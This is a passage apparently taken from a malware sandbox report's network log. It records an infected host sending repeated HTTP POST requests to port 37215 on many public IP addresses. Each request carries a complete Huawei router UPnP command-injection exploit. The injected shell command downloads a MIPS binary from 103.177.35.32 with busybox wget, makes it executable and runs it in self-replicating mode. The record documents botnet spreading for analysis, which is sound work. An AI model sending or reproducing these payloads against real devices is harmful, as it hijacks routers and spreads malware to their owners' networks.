                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        277192.168.2.235786241.45.30.18037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316539049 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        278192.168.2.2343572197.249.70.4837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316548109 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        279192.168.2.2332990157.126.90.5037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316548109 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        280192.168.2.234958841.129.16.24437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316548109 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        281192.168.2.2360716157.192.255.14337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316576004 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        282192.168.2.2351468197.29.239.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316576958 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        283192.168.2.2351834197.198.79.20337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316582918 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        284192.168.2.2334052197.28.73.13137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316587925 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        285192.168.2.23333244.89.39.22837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316589117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        286192.168.2.2352998157.136.217.7437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316596031 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
